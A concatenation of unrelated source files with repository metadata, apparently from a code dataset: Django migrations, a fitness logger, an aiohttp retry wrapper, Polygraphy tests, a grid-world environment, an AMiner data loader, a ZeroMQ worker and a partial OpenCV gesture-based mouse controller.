                ('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
                ('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
                ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
                ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
                ('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
                ('avatar', models.ImageField(blank=True, upload_to='')),
                ('gender', models.CharField(blank=True, choices=[('male', 'Male'), ('female', 'Female'), ('other', 'Other')], max_length=10)),
                ('bio', models.TextField(blank=True)),
                ('birthDay', models.DateField(blank=True, null=True)),
                ('language', models.CharField(blank=True, choices=[('en', 'English'), ('kr', 'Korean')], max_length=2)),
                ('currency', models.CharField(blank=True, choices=[('usd', 'USD'), ('krw', 'KRW')], max_length=3)),
                ('superhost', models.BooleanField(default=False)),
                ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
                ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
            ],
            options={
                'verbose_name': 'user',
                'verbose_name_plural': 'users',
                'abstract': False,
            },
            managers=[
                ('objects', django.contrib.auth.models.UserManager()),
            ],
        ),
    ]
| [
"“runnaway@naver.com”"
] | “runnaway@naver.com” |
8f621fcf4d57992e0318f3582902bd71e2732e6d | fcbacd428f9cbf0e384534fea1ebc068efa7285a | /data.py | 6700e4831b1b5bdc34e692d0fc5da333e279a696 | [] | no_license | punkungkub/RoobotEvolution | f064b5fa58e0a2920ccc9b349521ed0a1a29a86c | 8f4d1a40a3921b493cf963653eba07a5ed537b70 | refs/heads/master | 2022-11-27T01:44:50.513264 | 2020-08-04T06:48:11 | 2020-08-04T06:48:11 | 284,873,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,566 | py | import matplotlib.pyplot as plt
import numpy as np
import pickle, json
import os,shutil
from threading import Thread
class data:
    """Accumulates per-generation robot fitness data and persists plots/JSON."""

    def __init__(self):
        self.generation = []   # generation numbers in insertion order
        self.fitness = {}      # generation -> list of fitness values
        self.data = {}         # generation -> raw per-robot data dict

    def storage(self, gen, data):
        """Record one generation's population data.

        Bug fix: the original rebound the local name ``data`` to an empty
        list (``fitness,data=[],[]``) before iterating it, so
        ``self.fitness[gen]`` was always an empty list.

        :param gen: generation number.
        :param data: mapping of robot id -> dict containing a 'fitness' key.
        """
        self.generation.append(gen)
        self.data.update({gen: data})
        fitness = [data[person]['fitness'] for person in data]
        self.fitness[gen] = fitness

    def plot(self):
        """Scatter-plot fitness per generation and save it as dot_plot.jpeg."""
        plt.figure()
        for x in self.fitness:
            for y in self.fitness[x]:
                plt.scatter(x, y, c='k')
        plt.xlabel('Generation')
        plt.ylabel('Fitness')
        plt.savefig('dot_plot.jpeg')

    def saveData(self):
        """Dump the fitness history to data.txt as pretty-printed JSON."""
        with open('data.txt', 'w') as outfile:
            json.dump(self.fitness, outfile, indent=4)

    def saveProperty(self):
        """Dump the raw robot data to current_robot.txt as JSON."""
        with open('current_robot.txt', 'w') as outfile:
            json.dump(self.data, outfile, indent=4)

    def moveData(self):
        """Move the generated files into a dataStorage/ backup folder.

        Deliberately does nothing when the folder already exists, so an
        earlier backup is never overwritten.
        """
        print("Backing up data ...")
        path = os.path.join(os.getcwd(), 'dataStorage')
        if not os.path.exists(path):
            os.mkdir(path)
        else:
            return
        shutil.move(os.path.join(os.getcwd(), 'dot_plot.jpeg'), os.path.join(path, 'dot_plot.jpeg'))
        shutil.move(os.path.join(os.getcwd(), 'data.txt'), os.path.join(path, 'data.txt'))
        shutil.move(os.path.join(os.getcwd(), 'current_robot.txt'), os.path.join(path, 'current_robot.txt'))
        print("Completed!")
| [
"43475513+punkungkub@users.noreply.github.com"
] | 43475513+punkungkub@users.noreply.github.com |
f934db4460afcfe6a86fce63da946622c0bed8ad | 981ac0fc0958ed4258e8adb4408980857d8d0cc1 | /monitor/web_session.py | a4258028fbf0b035aafff6aada8783b9b6f5cd4e | [] | no_license | D3ee/YjMonitor | 1dc8e19d464784610cc9db9450d069b3bad5fe65 | 8179f9d39aa5b60274da4b7e38e173e380265c42 | refs/heads/master | 2020-05-27T23:52:57.340370 | 2019-05-27T10:28:57 | 2019-05-27T10:28:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,156 | py | import sys
import asyncio
import aiohttp
import printer
from exceptions import LogoutError, RspError
from json_rsp_ctrl import Ctrl, JsonRspType, DEFAULT_CTRL, TMP_DEFAULT_CTRL
sem = asyncio.Semaphore(2)
class WebSession:
    """Shared aiohttp session with infinite-retry helpers for JSON/binary/text."""

    def __init__(self):
        # One shared session; every request inherits a 4-second total timeout.
        self.var_session = aiohttp.ClientSession(timeout=aiohttp.ClientTimeout(total=4))

    @staticmethod
    async def __get_json_body(rsp):
        # content_type=None disables aiohttp's mimetype check.
        json_body = await rsp.json(content_type=None)
        return json_body

    @staticmethod
    async def __get_text_body(rsp):
        text = await rsp.text()
        return text

    @staticmethod
    async def __get_binary_body(rsp):
        return await rsp.read()

    # `method` mirrors the corresponding aiohttp method; currently only GET
    # and POST are supported.
    # `is_login` is to be removed later; it should be coordinated with the
    # expected-code handling of the json ctrl.
    async def request_json(self,
                           method,
                           url,
                           is_login=False,
                           ctrl: Ctrl = TMP_DEFAULT_CTRL,
                           **kwargs) -> dict:
        """Request *url* and retry until *ctrl* accepts the JSON body.

        Raises LogoutError when the API reports a logged-out state and
        is_login is False; other RspError subclasses propagate unchanged.
        """
        async with sem:
            i = 0
            while True:
                i += 1
                if i >= 10:
                    # Warn on every attempt once the retry count gets high.
                    printer.warn(url)
                try:
                    async with self.var_session.request(method, url, **kwargs) as rsp:
                        if rsp.status == 200:
                            json_body = await self.__get_json_body(rsp)
                            # Body is occasionally None/empty -- skip it outright.
                            # The read/text variants below do the same; never
                            # return an empty payload.
                            if json_body:
                                json_rsp_type = ctrl.verify(json_body)
                                if json_rsp_type == JsonRspType.OK:
                                    return json_body
                                elif json_rsp_type == JsonRspType.IGNORE:
                                    await asyncio.sleep(1.0)
                                elif json_rsp_type == JsonRspType.LOGOUT:
                                    # API reports that we are not logged in.
                                    print('api提示没有登录')
                                    print(json_body)
                                    if not is_login:
                                        raise LogoutError(msg='提示没有登陆')
                                    else:
                                        return json_body
                        elif rsp.status == 403:
                            # Rate limited: back off for four minutes.
                            printer.warn(f'403频繁, {url}')
                            await asyncio.sleep(240)
                except RspError:
                    raise
                except asyncio.CancelledError:
                    raise
                except:
                    # NOTE(review): bare except deliberately swallows transient
                    # network errors and retries after logging them.
                    print(sys.exc_info()[0], sys.exc_info()[1], url)
                    await asyncio.sleep(0.02)

    async def request_binary(self,
                             method,
                             url,
                             **kwargs) -> bytes:
        """Request *url* and retry until a non-empty binary body is received."""
        async with sem:
            i = 0
            while True:
                i += 1
                if i >= 10:
                    printer.warn(url)
                try:
                    async with self.var_session.request(method, url, **kwargs) as rsp:
                        if rsp.status == 200:
                            binary_body = await self.__get_binary_body(rsp)
                            if binary_body:
                                return binary_body
                        elif rsp.status == 403:
                            # Rate limited: back off for four minutes.
                            printer.warn(f'403频繁, {url}')
                            await asyncio.sleep(240)
                except asyncio.CancelledError:
                    raise
                except:
                    # NOTE(review): bare except -- retry on any network failure.
                    print(sys.exc_info()[0], sys.exc_info()[1], url)
                    await asyncio.sleep(0.02)

    async def request_text(self,
                           method,
                           url,
                           **kwargs) -> str:
        """Request *url* and retry until a non-empty text body is received."""
        async with sem:
            i = 0
            while True:
                i += 1
                if i >= 10:
                    printer.warn(url)
                try:
                    async with self.var_session.request(method, url, **kwargs) as rsp:
                        if rsp.status == 200:
                            text_body = await self.__get_text_body(rsp)
                            if text_body:
                                return text_body
                        elif rsp.status == 403:
                            # Rate limited: back off for four minutes.
                            printer.warn(f'403频繁, {url}')
                            await asyncio.sleep(240)
                except asyncio.CancelledError:
                    raise
                except:
                    # NOTE(review): bare except -- retry on any network failure.
                    print(sys.exc_info()[0], sys.exc_info()[1], url)
                    await asyncio.sleep(0.02)
| [
"yjqiang1@gmail.com"
] | yjqiang1@gmail.com |
fe1157f372e8999831140b5c8835adac1ce983b2 | bc572eca7a03aec83ee55300887a21cad3dbd160 | /tools/Polygraphy/tests/comparator/test_postprocess.py | 0cbba453125e5baa918d358612e41d35c9cb243d | [
"Apache-2.0",
"BSD-3-Clause",
"ISC",
"BSD-2-Clause",
"MIT"
] | permissive | wuqiangch/TensorRT | fba0029dc5c0b3b9ffa091e45f26d8d10d702393 | d04182cd0086c70db4a8ad30e0d7675c4eb33782 | refs/heads/master | 2023-05-31T21:04:01.079351 | 2021-06-23T20:37:20 | 2021-06-25T19:39:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,520 | py | #
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from polygraphy.comparator import PostprocessFunc, IterationResult
class TestTopK(object):
    """Unit tests for PostprocessFunc.topk_func."""

    def test_basic(self):
        scores = np.array([1, 2, 3, 4, 5], dtype=np.float32)
        apply_topk = PostprocessFunc.topk_func(k=3)
        result = apply_topk(IterationResult({"x": scores}))
        # Indices of the three largest values, best first.
        assert np.all(result["x"] == [4, 3, 2])

    def test_k_can_exceed_array_len(self):
        scores = np.array([1, 2, 3, 4, 5], dtype=np.float32)
        apply_topk = PostprocessFunc.topk_func(k=10)
        result = apply_topk(IterationResult({"x": scores}))
        assert np.all(result["x"] == [4, 3, 2, 1, 0])

    def test_per_output_top_k(self):
        scores = np.array([1, 2, 3, 4, 5], dtype=np.float32)
        apply_topk = PostprocessFunc.topk_func(k={"": 10, "y": 2})
        result = apply_topk(IterationResult({"x": scores, "y": scores}))
        # "" is the default k; "y" overrides it with 2.
        assert np.all(result["x"] == [4, 3, 2, 1, 0])
        assert np.all(result["y"] == [4, 3])
| [
"rajeevsrao@users.noreply.github.com"
] | rajeevsrao@users.noreply.github.com |
96659a31eb97f9771b0d4e5698d71ee2d18d1006 | b715012e5ba8c54ff6676aa4c7c7f3c7ed7ee32a | /gridworld.py | bf3fb97f8fcfb3f37474453ca2321ab8d1b56b8a | [] | no_license | chengshaozhe/sheep_policy | 569adf80e129ed070e0866e6f53d1b61ddfcd76d | fcbfaaa2506e228036fe8606ca271555fc3f291a | refs/heads/master | 2021-08-08T07:23:59.063663 | 2020-04-19T12:35:37 | 2020-04-19T12:35:37 | 158,331,454 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,104 | py |
import numpy as np
from viz import *
from reward import *
import random
from collections import deque
import os
from PIL import Image
class GridWorld():
    """2-D grid world with named feature maps, terminal states and obstacles.

    Features are stored as an OrderedDict mapping name -> {coordinate: value}
    and can be rendered with matplotlib via helpers imported from viz.
    """

    def __init__(self, name='', nx=None, ny=None):
        # nx, ny: grid width/height; coordinates enumerates every (x, y) cell.
        self.name = name
        self.nx = nx
        self.ny = ny
        self.coordinates = tuple(it.product(range(self.nx), range(self.ny)))
        self.terminals = []
        self.obstacles = []
        self.features = co.OrderedDict()

    def add_terminals(self, terminals=[]):
        # Append the given states to the terminal list.
        for t in terminals:
            self.terminals.append(t)

    def add_obstacles(self, obstacles=[]):
        # Append the given states to the obstacle list.
        for o in obstacles:
            self.obstacles.append(o)

    def add_feature_map(self, name, state_values, default=0):
        # Initialise a full map with `default`, then overwrite the cells
        # present in state_values.
        self.features[name] = {s: default for s in self.coordinates}
        self.features[name].update(state_values)

    def is_state_valid(self, state):
        # Valid = inside grid bounds and not an obstacle.
        if state[0] not in range(self.nx):
            return False
        if state[1] not in range(self.ny):
            return False
        if state in self.obstacles:
            return False
        return True

    def reward(self, s, a, s_n, W={}):
        # Reward of arriving in s_n: sum of all feature values there, or a
        # weighted sum when a weight dict W is supplied.
        if not W:
            return sum(map(lambda f: self.features[f][s_n], self.features))
        return sum(map(lambda f: self.features[f][s_n] * W[f], W.keys()))

    def draw_feature(self, ax, name, **kwargs):
        # Render a single feature map as a 2-D image on `ax`.
        I = dict_to_array(self.features[name])
        return draw_2D_array(I, ax, **kwargs)

    def draw_features_first_time(self, ax, features=[], colors={},
                                 masked_values={}, default_masked=0):
        # First-time rendering: assigns each feature a free colour and a
        # masked value, creates the axes if needed, and returns the axes
        # plus a dict of the created AxesImage handles.
        assert set(features).issubset(set(self.features.keys()))
        if not features:
            features = self.features.keys()
        if len(features) > len(color_set):
            raise ValueError("there are %d features and only %d colors"
                             % (len(features), len(color_set)))
        # Colours not already claimed in `colors`, in color_set order.
        free_color = list(filter(lambda c: c not in colors.values(),
                                 color_set))
        colors.update({f: free_color.pop(0)
                       for f in features if f not in colors.keys()})
        masked_values.update({f: default_masked
                              for f in features if f not in masked_values.keys()})
        assert set(masked_values.keys()) == set(colors.keys()) == set(features)
        if not ax:
            fig, ax = plt.subplots(1, 1, tight_layout=True)

        def single_feature(ax, name):
            f_color = colors[name]
            masked_value = masked_values[name]
            return self.draw_feature(ax, name, f_color=f_color,
                                     masked_value=masked_value)
        ax_images = {f: single_feature(ax, f) for f in features}
        return ax, ax_images

    def update_features_images(self, ax_images, features=[], masked_values={},
                               default_masked=0):
        # Refresh already-created AxesImage objects with current feature values.
        def update_single_feature(name):
            try:
                masked_value = masked_values[name]
            except:
                masked_value = default_masked
            I = dict_to_array(self.features[name])
            return update_axes_image(ax_images[name], I, masked_value)
        return {f: update_single_feature(f) for f in features}

    def draw(self, ax=None, ax_images={}, features=[], colors={},
             masked_values={}, default_masked=0, show=False, save_to=''):
        # Draw features not yet rendered, update the rest, and return both
        # the axes and the combined image-handle dict.
        plt.cla()
        if ax:
            ax.get_figure()
        new_features = [f for f in features if f not in ax_images.keys()]
        old_features = [f for f in features if f in ax_images.keys()]
        ax, new_ax_images = self.draw_features_first_time(ax, new_features,
                                                          colors, masked_values, default_masked=0)
        old_ax_images = self.update_features_images(ax_images, old_features,
                                                    masked_values,
                                                    default_masked=0)
        ax_images.update(old_ax_images)
        ax_images.update(new_ax_images)
        # if save_to:
        #     fig_name = os.path.join(save_to, str(self.name) + ".png")
        #     plt.savefig(fig_name, dpi=200)
        #     if self.verbose > 0:
        #         print ("saved %s" % fig_name)
        # if show:
        #     plt.show()
        return ax, ax_images
# def reward(s, a, env=None, const=-10, is_terminal=None):
# return const + sum(map(lambda f: env.features[f][s], env.features))
def grid_reward(s, a, sn, env=None, const=-1):
    """Reward for arriving in `sn`: the sheep feature value at terminal
    states, otherwise the constant step cost, plus the obstacle penalty
    whenever `sn` is an obstacle."""
    if sn in env.terminals:
        base = env.features['sheep'][sn]
    else:
        base = const
    penalty = env.features['obstacle'][sn] if sn in env.obstacles else 0
    return base + penalty
def physics(s, a, env=None):
    """Deterministic transition: terminal states absorb; otherwise move by
    `a` when the resulting state is valid, else stay put."""
    if s in env.terminals:
        return s
    candidate = tuple(coord + delta for coord, delta in zip(s, a))
    return candidate if env.is_state_valid(candidate) else s
def getValidActions(s, A, env=None):
    """Return the subset of actions in A whose successor state from s is valid.

    Bug fix: the original used ``valid_actions.append[a]`` (subscription
    instead of a call), which raised ``TypeError`` the first time a valid
    action was found.
    """
    valid_actions = []
    for a in A:
        s_n = tuple(map(sum, zip(s, a)))
        if env.is_state_valid(s_n):
            valid_actions.append(a)
    return valid_actions
def state_to_image_array(env, image_size, wolf_states, sheeps, obstacles):
    """Render wolf/sheep/obstacle feature maps to an RGB array of image_size.

    Registers the three feature maps on `env`, draws them (wolf red, sheep
    green, obstacle yellow), grabs the matplotlib canvas as raw RGB bytes
    and resizes the result with PIL.

    :param env: GridWorld instance (mutated: feature maps are added).
    :param image_size: target (width, height[, channels]) of the output.
    :param wolf_states: iterable of wolf coordinates (each gets value 1).
    :param sheeps: dict of sheep coordinate -> value.
    :param obstacles: dict of obstacle coordinate -> value.
    :return: numpy uint8 array of shape (height, width, 3).
    """
    wolf = {s: 1 for s in wolf_states}
    env.add_feature_map("wolf", wolf, default=0)
    env.add_feature_map("sheep", sheeps, default=0)
    env.add_feature_map("obstacle", obstacles, default=0)
    ax, _ = env.draw(features=("wolf", "sheep", "obstacle"), colors={
        'wolf': 'r', 'sheep': 'g', 'obstacle': 'y'})
    fig = ax.get_figure()
    # fig.set_size_inches((image_size[0] / fig.dpi, image_size[1] / fig.dpi)) # direct resize
    fig.canvas.draw()
    # NOTE(review): np.fromstring is deprecated in modern numpy; np.frombuffer
    # would be the drop-in replacement here.
    image = np.fromstring(fig.canvas.tostring_rgb(),
                          dtype=np.uint8, sep='')
    image_array = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
    # use PIL to resize (resample mode 3 == BICUBIC)
    pil_im = Image.fromarray(image_array)
    image_array = np.array(pil_im.resize(image_size[:2], 3))
    # print (image_array.shape)
    # print (len(np.unique(image_array)))
    return image_array
| [
"chengshaozhe@gmail.com"
] | chengshaozhe@gmail.com |
ebc1183cbaf4a2933e809513c7b5f6acf4717951 | f9efe2ce2325ad3d5d3c5762f3c85e51a2612ea8 | /expert_finding/data/io_aminer.py | 26118e99e5876e001ee1f12a857a1ff36bc01e49 | [] | no_license | elvesmrodrigues/Kcore_Expert_Finding | 3e3347fa77b51d81999fcac12ac9a7324568763e | c03174640f62771492805fb6cbb08f3d2ba6f88f | refs/heads/main | 2023-06-25T03:42:15.155785 | 2021-07-26T12:57:22 | 2021-07-26T12:57:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,136 | py | import itertools
import os
import pkg_resources
import json
def load_papers(infname):
papers = list()
with open(infname, 'r', encoding='UTF-8') as f:
for key, group in itertools.groupby(f, key=lambda l: l.strip(' \n\r') == ''):
if not key:
refs = []
authors = []
title, venue, year, idx, abstract = [''] * 5
for item in group:
item = item.strip(' \r\n')
if item.startswith('#*'):
title = item[2:].strip()
elif item.startswith('#@'):
authors = item[2:].split(',')
authors = [a.strip() for a in authors]
elif item.startswith('#t'):
year = item[2:].strip()
elif item.startswith('#c'):
venue = item[2:].strip()
elif item.startswith('#index'):
idx = int(item[6:].strip())
elif item.startswith('#!'):
abstract = item[2:].strip()
elif item.startswith('#%'):
refs.append(int(item[2:].strip()))
if len(title + abstract) > 50:
papers.append({
"idx": idx,
"title": title,
"venue": venue,
"authors": authors,
"year": year,
"refs": refs,
"abstract": abstract
})
return papers
def load_experts(foldername, version="V1"):
print("Loading experts from '", foldername, "'")
list_of_files = {
"boosting": "Boosting.txt",
"data_mining": "Data-Mining.txt",
"information_extraction": "Information-Extraction.txt",
"intelligent_agents": "Intelligent-Agents.txt",
"machine_learning": "Machine-Learning.txt",
"natural_language_processing": "Natural-Language-Processing.txt",
"ontology_alignment": "Ontology-Alignment.txt",
"planning": "Planning.txt",
"semantic_web": "Semantic-Web.txt",
"support_vector_machine": "Support-Vector-Machine.txt",
"computer_vision": "Computer-Vision.txt",
"cryptography": "Cryptography.txt",
"neural_networks": "Neural-Networks.txt"
}
list_of_new_files = {
"information_extraction": "New-Information-Extraction.txt",
"intelligent_agents": "New-Intelligent-Agents.txt",
"machine_learning": "New-Machine-Learning.txt",
"natural_language_processing": "New-Natural-Language-Processing.txt",
"planning": "New-Planning.txt",
"semantic_web": "New-Semantic-Web.txt",
"support_vector_machine": "New-Support-Vector-Machine.txt",
}
authors = dict()
if version == "V2" or version == "V3":
for topic, filename in list_of_files.items():
authors[topic] = list()
file = pkg_resources.resource_filename("expert_finding", os.path.join(foldername, filename))
print("Reading file: ", filename)
with open(file, 'rb') as f:
for line in f:
try:
string = line.decode('utf-8').strip()
authors[topic].append(string)
except:
print("Can't decode:", line)
elif version == "V1":
for topic, filename in list_of_new_files.items():
authors[topic] = list()
file = pkg_resources.resource_filename("expert_finding", os.path.join(foldername, filename))
print("Reading file: ", filename)
with open(file, 'rb') as f:
for line in f:
try:
string = line.decode('utf-8').strip()
authors[topic].append(string)
except:
print("Can't decode:", line)
else:
print("Unknown version provided !")
return None
return authors
| [
"653574281@qq.com"
] | 653574281@qq.com |
51d9224e7d85e7e8c277046b5010c9ddf16e3dd0 | 57068b73b78602a4a8ea1c2c677b2c9867d7f208 | /examples-code/zmq/Request-Reply-Broker/rrworker.py | 0ef890c37bb4e131882a7fa89f9bf8c7118ec597 | [] | no_license | firewood1996/MELINDA | 2f158d1942224b1cb7ef72d46a5f510229f54e87 | a090cea086e6b2502ea4f910008f9daf50e464d6 | refs/heads/master | 2023-02-22T11:40:44.350351 | 2021-01-21T22:35:22 | 2021-01-21T22:35:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 964 | py | #
# Request-reply service in Python
# Connects REP socket to tcp://localhost:5560
#
import zmq
import threading
import time
import random
def worker_routine(url, id, context=None):
"""Worker routine"""
context = context or zmq.Context.instance()
# Socket to talk to dispatcher
socket = context.socket(zmq.REP)
socket.connect(url)
while True:
string = socket.recv()
print("Worker {}: Message request: {}".format(id, string))
# do some 'work'
work_time = random.randint(1, 100) * 0.01
time.sleep(work_time)
# send reply back to client
socket.send_string("Worker {} took {:.3f}s".format(id, work_time))
def main():
random.seed()
url_broker = "tcp://localhost:5560"
# Launch pool of worker threads
for i in range(5):
thread = threading.Thread(target=worker_routine, args=(url_broker, i,))
thread.start()
if __name__ == "__main__":
main()
| [
"aluiziorocha@gmail.com"
] | aluiziorocha@gmail.com |
865653721e38190f7bb6c4e6c6f1a383d99f2912 | af24f5e44068ddc91e05ecdbafac2d01755fd2e9 | /blog/migrations/0020_auto_20200628_1343.py | 2777a5cec6aa72149d91a967dc170165469e8635 | [] | no_license | IsraJC/my-first-blog | a34b666fe09ae091c54c00e6121a6bd528fd22e1 | 84bc92a6cde1aec527600040cd382cd1853c1574 | refs/heads/master | 2023-08-12T18:42:21.745988 | 2021-10-04T19:50:09 | 2021-10-04T19:50:09 | 269,368,823 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | # Generated by Django 2.2.13 on 2020-06-28 12:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0019_auto_20200628_1343'),
]
operations = [
migrations.AlterField(
model_name='cv',
name='number',
field=models.CharField(blank=True, default='', max_length=11),
),
]
| [
"israchanna@gmail.com"
] | israchanna@gmail.com |
2c1de13fdef7761a42417213fdc33376772cf25d | f06e3ade8249ccbee25ebad78dea2948c2286cdb | /marketplace/products/migrations/0002_auto_20190120_2126.py | 2cf39d0da9236d189f3da9d07b2e8cdda8523a9f | [] | no_license | billangli/shopify-backend-challenge-2019 | e5c22816f4c460ae13113fc1d0d4a8a50093c157 | e33a7c3870adee61edcf9880128a96d934529e7b | refs/heads/master | 2020-04-17T12:08:15.272777 | 2019-01-22T03:01:37 | 2019-01-22T03:01:37 | 166,569,083 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 681 | py | # Generated by Django 2.1.5 on 2019-01-20 21:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('products', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50)),
('price', models.FloatField()),
('inventory_count', models.IntegerField()),
],
),
migrations.DeleteModel(
name='Link',
),
]
| [
"bill.ang.li@hotmail.com"
] | bill.ang.li@hotmail.com |
e3d532d22641804ec9d82074ad11b3215ec161a3 | 4deaf8f4f1a91fc12c3a3d10bc8794fa62f54657 | /switch.py | f6bd0e72d22502c54be4568db69b160e68abb5b5 | [] | no_license | AdopaX/Manimouse | 03554d81ef5a1a8576ec7041d361541dff0c5096 | 3b02fca16b93be98af093274e6249465b9ee2295 | refs/heads/master | 2021-06-14T21:35:03.308346 | 2017-01-29T17:27:14 | 2017-01-29T17:27:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,308 | py | # All packages needed for the program are imported ahead
import cv2
import numpy as np
import pyautogui
import time
# Some global variables or others that need prior intialization are initalized here
# colour ranges for feeding to the inRange funtions
blue_range = np.array([[88,78,20],[128,255,255]])
yellow_range = np.array([[21,70,80],[61,255,255]])
red_range = np.array([[158,85,72],[180 ,255,255]])
# Prior initialization of all centers for safety
b_cen, y_pos, r_cen = [240,320],[240,320],[240,320]
cursor = [960,540]
# Area ranges for contours of different colours to be detected
r_area = [100,1700]
b_area = [100,1700]
y_area = [100,1700]
# Rectangular kernal for eroding and dilating the mask for primary noise removal
kernel = np.ones((7,7),np.uint8)
actionHistory = [' ' for i in range(7)]
# Status variables defined globally
perform = False
showCentroid = False
leftHand = False
# 'nothing' function is useful when creating trackbars
# It is passed as last arguement in the cv2.createTrackbar() function
def nothing(x):
pass
# To bring to the top the contours with largest area in the specified range
# Used in drawContour()
def swap( array, i, j):
temp = array[i]
array[i] = array[j]
array[j] = temp
# Distance between two centroids
def distance( c1, c2):
distance = pow( pow(c1[0]-c2[0],2) + pow(c1[1]-c2[1],2) , 0.5)
return distance
def makeActionHistory( preHistory, latestAction):
l = len(preHistory)
newHistory = [' ' for i in range(l)]
for i in range(l-2):
newHistory[i] = preHistory[i+1]
newHistory[l-1] = latestAction
return newHistory
def checkActionHistory( actionHistory, action):
for i in range(len(actionHistory)-1):
if actionHistory[i] == action:
return False
else:
return True
# To toggle status of control variables
def changeStatus(key):
global perform
global showCentroid
global leftHand
global yellow_range,red_range,blue_range
# toggle mouse simulation
if key == ord('p'):
perform = not perform
if perform:
print 'Mouse simulation ON...'
else:
print 'Mouse simulation OFF...'
# toggle display of centroids
elif key == ord('c'):
showCentroid = not showCentroid
if showCentroid:
print 'Showing Centroids...'
else:
print 'Not Showing Centroids...'
elif key == ord('r'):
print '**********************************************************************'
print ' You have entered recalibration mode.'
print ' Use the trackbars to calibrate and press SPACE when done.'
print ' Press D to use the default settings'
print '**********************************************************************'
yellow_range = calibrateColor('Yellow', yellow_range)
red_range = calibrateColor('Red', red_range)
blue_range = calibrateColor('Blue', blue_range)
elif key == ord('l'):
leftHand = not leftHand
if leftHand:
print 'Left-handed mode initiated...'
else:
print 'Right-handed mode initiated...'
else:
pass
# cv2.inRange function is used to filter out a particular color from the frame
# The result then undergoes morphosis i.e. erosion and dilation
# Resultant frame is returned as mask
def makeMask(hsv_frame, color_Range):
mask = cv2.inRange( hsv_frame, color_Range[0], color_Range[1])
# Morphosis next ...
eroded = cv2.erode( mask, kernel, iterations=1)
dilated = cv2.dilate( eroded, kernel, iterations=1)
return dilated
# Contours on the mask are detected.. Only those lying in the previously set area
# range are filtered out and the centroid of the largest of these is drawn and returned
def drawCentroid(vid, color_area, mask, showCentroid):
_, contour, _ = cv2.findContours( mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
l=len(contour)
area = np.zeros(l)
# filtering contours on the basis of area rane specified globally
for i in range(l):
if cv2.contourArea(contour[i])>color_area[0] and cv2.contourArea(contour[i])<color_area[1]:
area[i] = cv2.contourArea(contour[i])
else:
area[i] = 0
a = sorted( area, reverse=True)
# bringing contours with largest valid area to the top
for i in range(l):
for j in range(1):
if area[i] == a[j]:
swap( contour, i, j)
if l > 0 :
# finding centroid using method of 'moments'
M = cv2.moments(contour[0])
if M['m00'] != 0:
cx = int(M['m10']/M['m00'])
cy = int(M['m01']/M['m00'])
center = (cx,cy)
if showCentroid:
cv2.circle( vid, center, 5, (0,0,255), -1)
return center
else:
# return error handling values
return (-1,-1)
# This function helps in filtering the required colored objects from the background
def calibrateColor(color, def_range):
global kernel
name = 'Calibrate '+ color
cv2.namedWindow(name)
cv2.createTrackbar('Hue', name, def_range[0][0]+20, 180, nothing)
cv2.createTrackbar('Sat', name, def_range[0][1] , 255, nothing)
cv2.createTrackbar('Val', name, def_range[0][2] , 255, nothing)
while(1):
ret , frameinv = cap.read()
frame=cv2.flip(frameinv ,1)
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
hue = cv2.getTrackbarPos('Hue', name)
sat = cv2.getTrackbarPos('Sat', name)
val = cv2.getTrackbarPos('Val', name)
lower = np.array([hue-20,sat,val])
upper = np.array([hue+20,255,255])
mask = cv2.inRange(hsv, lower, upper)
eroded = cv2.erode( mask, kernel, iterations=1)
dilated = cv2.dilate( eroded, kernel, iterations=1)
cv2.imshow(name, dilated)
k = cv2.waitKey(5) & 0xFF
if k == ord(' '):
cv2.destroyWindow(name)
return np.array([[hue-20,sat,val],[hue+20,255,255]])
elif k == ord('d'):
cv2.destroyWindow(name)
return def_range
'''
This function takes as input the center of yellow region (yc) and
the previous cursor position (pyp). The new cursor position is calculated
in such a way that the mean deviation for desired steady state is reduced.
'''
def setCursorPos( yc, pyp):
yp = np.zeros(2)
if abs(yc[0]-pyp[0])<5 and abs(yc[1]-pyp[1])<5:
yp[0] = yc[0] + .7*(pyp[0]-yc[0])
yp[1] = yc[1] + .7*(pyp[1]-yc[1])
else:
yp[0] = yc[0] + .1*(pyp[0]-yc[0])
yp[1] = yc[1] + .1*(pyp[1]-yc[1])
return yp
# Depending upon the relative positions of the three centroids, this function chooses whether
# the user desires free movement of cursor, left click, right click or dragging
def chooseAction(yp, rc, bc, actionHistory):
out = np.array(['move', 'false'])
if rc[0]!=-1 and bc[0]!=-1:
if not leftHand and checkActionHistory( actionHistory, 'ONOFF'):
